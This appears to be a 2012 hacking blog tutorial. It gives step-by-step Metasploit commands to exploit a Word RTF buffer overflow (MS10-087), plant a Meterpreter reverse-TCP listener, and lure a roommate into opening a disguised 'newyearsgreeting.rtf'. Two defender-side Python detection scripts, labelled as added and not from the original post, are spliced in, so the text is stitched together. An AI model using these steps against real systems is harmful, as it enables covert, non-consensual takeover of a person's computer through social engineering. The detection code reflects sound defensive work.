Exploit MS Word to Embed a Listener on Your Roommate's Computer

By occupytheweb
12/21/2012 1:20 am
Listeners

In my last hack blog on crashing your roommate's Win7 system, we started looking at client-side attacks. As promised, we will be looking at some more client-side attacks.

As web servers and operating systems have become hardened and now live behind significant perimeter defenses, hackers have migrated to the easiest route to the pot of gold: the often unpatched, unhardened client-side system, with little in the way of defenses and a plethora of vulnerable software, including the ubiquitous Microsoft Office products.

This hack works on Word 2007 or Word 2010. It exploits a buffer overflow in Word to allow us to plant a listener on our target system. I'm assuming that you have the victim's IP address and have verified that Microsoft Office is running (a good assumption, but it's better to verify).

Step 1: Start Metasploit

So, let's fire up Metasploit and find the exploit/windows/fileformat/ms10_087_rtf_pfragments_bof module. Now, set Metasploit to use this exploit by typing:

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof


Step 2: Set a Payload

Then we need to set a payload. In this case, we wish to use Metasploit's powerful Meterpreter to establish a listener on the victim's system.

msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp

Step 3: Show Options

Now, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typing:

msf > show options


Step 4: Change FILENAME

We can see from the screenshot above that Metasploit has a number of options for this exploit. First, we are creating a .rtf file, and Metasploit gives it a default name in the FILENAME option. Let's change that name to something more inviting to our victim, such as newyearsgreeting.rtf:

msf > set FILENAME newyearsgreeting.rtf

Step 5: Set Your Local Host

Next we need to set the LHOST, or local host. This will be the system we will be listening from, usually our local system, but it could be any system you want to listen from. We simply need to set LHOST to the IP address of our listening system, in this case 192.168.1.100:

msf > set LHOST 192.168.1.100

Step 6: Last Check of Options

Before we exploit the victim's system, let's check to make sure all our options are set properly:

msf > show options


Note in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the
LHOST is 192.168.1.100.

Step 7: Exploit

Now, we are ready to exploit. Simply type:

msf > exploit


You can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at
/root/.msf4/local/newyearsgreeting.rtf.
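On the receiving side, an attachment like the one this step produces can be triaged without opening it: the module name says which RTF feature it abuses (the pFragments shape property), so a mail gateway or sandbox can flag RTF files that carry that property with an abnormally long value. The Python scanner below is an added example written for that defensive purpose; it is not code from the original post or from Metasploit. The property layout `{\sp{\sn pFragments}{\sv ...}}` is assumed from RTF drawing-object syntax, the RTF samples embedded in it are constructed (the oversized one is plain filler, not exploit data), and the 64-byte threshold is an assumed tuning value.

```python
"""Static triage of RTF attachments for the pFragments shape property that the
ms10_087_rtf_pfragments_bof module abuses.

Added example (defender side); not code from the original post or from
Metasploit. The property layout {\\sp{\\sn pFragments}{\\sv ...}} is assumed
from RTF drawing-object syntax, the samples below are constructed, and the
length threshold is an assumed tuning value."""
import re
import sys
from typing import Dict

# A shape property in RTF is a name/value pair: {\sp{\sn NAME}{\sv VALUE}}.
# We capture the value of any property named pFragments (case-insensitively,
# so a changed letter case does not hide it) and inspect its length.
PFRAGMENTS_RE = re.compile(
    rb"\{\\sn\s*pFragments\s*\}\s*\{\\sv\s*([^}]*)\}", re.IGNORECASE)

# Legitimate pFragments values are short; an oversized value is the size
# anomaly of the MS10-087 trigger. 64 bytes is an assumed threshold.
MAX_VALUE_LEN = 64


def looks_like_rtf(data: bytes) -> bool:
    """RTF files start with the {\\rtf header (leading whitespace tolerated)."""
    return data.lstrip().startswith(b"{\\rtf")


def triage_rtf(data: bytes, max_value_len: int = MAX_VALUE_LEN) -> Dict[str, object]:
    """Return a verdict: whether the bytes are RTF, how many pFragments
    properties appear, the longest value seen, and a suspicious flag."""
    verdict = {"is_rtf": looks_like_rtf(data), "pfragments_count": 0,
               "longest_value": 0, "suspicious": False}
    if not verdict["is_rtf"]:
        return verdict
    for match in PFRAGMENTS_RE.finditer(data):
        verdict["pfragments_count"] += 1
        verdict["longest_value"] = max(verdict["longest_value"], len(match.group(1)))
    verdict["suspicious"] = verdict["longest_value"] > max_value_len
    return verdict


def triage_file(path: str) -> Dict[str, object]:
    """Convenience wrapper for scanning a file on disk."""
    with open(path, "rb") as fh:
        return triage_rtf(fh.read())


# Constructed samples (not real documents, not exploit data).
BENIGN_RTF = b"{\\rtf1\\ansi Happy New Year, roommate!\\par}"
# A drawing object carrying a short pFragments value.
SHAPE_RTF = (b"{\\rtf1\\ansi{\\shp{\\*\\shpinst"
             b"{\\sp{\\sn pFragments}{\\sv 1;1;0000}}}}\\par}")
# The same structure with a 500-byte filler value, the size anomaly the
# scanner is meant to catch.
OVERSIZED_RTF = (b"{\\rtf1\\ansi{\\shp{\\*\\shpinst"
                 b"{\\sp{\\sn pFragments}{\\sv " + b"4" * 500 + b"}}}}\\par}")

if __name__ == "__main__":
    # Usage: python rtf_triage.py <file.rtf> ...; with no arguments, run the
    # constructed samples so the output format can be seen.
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, triage_file(p))
    else:
        for name, sample in (("benign", BENIGN_RTF), ("shape", SHAPE_RTF),
                             ("oversized", OVERSIZED_RTF)):
            print(name, triage_rtf(sample))
```

The scanner keys on value length rather than on any particular byte pattern, so it does not depend on how a given generator fills the value; the cost is that a legitimate document with an unusually long pFragments value is flagged for manual review, which is the right direction of error for an attachment filter.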

Step 8: Send the File to the Victim

Now we need to send this file to the victim through email or another method. Once the victim opens the file, the Word application will hang or crash, leaving us with an active Meterpreter session on the victim's system. With an active Meterpreter session on the victim's system, we have nearly total control of, or "own", their system.
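From the defender's side, the telltale of this last step is that Word itself holds the Meterpreter connection: once the RTF is opened, WINWORD.EXE opens an outbound TCP connection to the listener (here 192.168.1.100), something a word processor has no reason to do on its own. The Python detector below is an added example, not part of the original post, that runs over Sysmon Event ID 3 (network connection) records exported as JSON lines. The field names follow Sysmon's schema; the sample records, including their process IDs and the destination port, are constructed.

```python
"""Flag outbound network connections initiated by Microsoft Office processes.

Added example (defender side); not code from the original post or from
Metasploit. Input: Sysmon Event ID 3 (NetworkConnect) records, one JSON
object per line. Field names (Image, Initiated, DestinationIp, ...) follow
Sysmon's schema; the sample records below are constructed."""
import ipaddress
import json
from typing import Dict, Iterable, List

# Document-rendering processes that have no business opening outbound
# sockets on their own (assumed list; extend it for your environment).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}


def is_office_process(image: str) -> bool:
    """True when the image path's basename is one of the Office binaries."""
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return basename.lower() in OFFICE_IMAGES


def is_loopback(ip: str) -> bool:
    """Loopback traffic (add-in IPC and the like) is excluded to cut noise."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def detect_office_callbacks(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one alert per outbound, non-loopback connection that an Office
    process initiated. Blank and malformed lines are skipped, not fatal."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue
        # Only network-connection events; EventID may be exported as int or str.
        if str(ev.get("EventID")) != "3":
            continue
        image = ev.get("Image", "")
        if not is_office_process(image):
            continue
        # Sysmon records Initiated as the string "true"/"false".
        if str(ev.get("Initiated", "")).lower() != "true":
            continue
        dest_ip = ev.get("DestinationIp", "")
        if is_loopback(dest_ip):
            continue
        alerts.append({
            "time": ev.get("UtcTime", ""),
            "image": image,
            "pid": str(ev.get("ProcessId", "")),
            "dest": f"{dest_ip}:{ev.get('DestinationPort', '')}",
            "reason": "Office process initiated an outbound TCP connection",
        })
    return alerts


# Constructed sample log: a browser connection (benign), a Word connection to
# the listener address used in the post (alert), a Word loopback connection
# (ignored), an inbound connection to Word (ignored), a process-creation
# record (wrong event type, ignored) and a junk line.
SAMPLE_LOG = """\
{"EventID": 3, "UtcTime": "2012-12-21 01:20:01", "Image": "C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe", "ProcessId": 1204, "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 443}
{"EventID": 3, "UtcTime": "2012-12-21 01:20:07", "Image": "C:\\\\Program Files\\\\Microsoft Office\\\\Office14\\\\WINWORD.EXE", "ProcessId": 3316, "Initiated": "true", "DestinationIp": "192.168.1.100", "DestinationPort": 4444}
{"EventID": 3, "UtcTime": "2012-12-21 01:20:08", "Image": "C:\\\\Program Files\\\\Microsoft Office\\\\Office14\\\\WINWORD.EXE", "ProcessId": 3316, "Initiated": "true", "DestinationIp": "127.0.0.1", "DestinationPort": 6789}
{"EventID": 3, "UtcTime": "2012-12-21 01:20:09", "Image": "C:\\\\Program Files\\\\Microsoft Office\\\\Office14\\\\WINWORD.EXE", "ProcessId": 3316, "Initiated": "false", "DestinationIp": "192.168.1.100", "DestinationPort": 49152}
{"EventID": 1, "UtcTime": "2012-12-21 01:20:10", "Image": "C:\\\\Program Files\\\\Microsoft Office\\\\Office14\\\\WINWORD.EXE", "ProcessId": 3316, "CommandLine": "WINWORD.EXE newyearsgreeting.rtf"}
this line is not JSON and is skipped
"""

if __name__ == "__main__":
    for alert in detect_office_callbacks(SAMPLE_LOG.splitlines()):
        print(alert)
```

Because the connection comes from the Office process itself rather than from a child process, a rule that only watches for Office spawning cmd.exe or PowerShell would miss this case; the network-connection event is the one to key on, and the Word hang or crash the post mentions is a useful corroborating signal in the Application event log.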
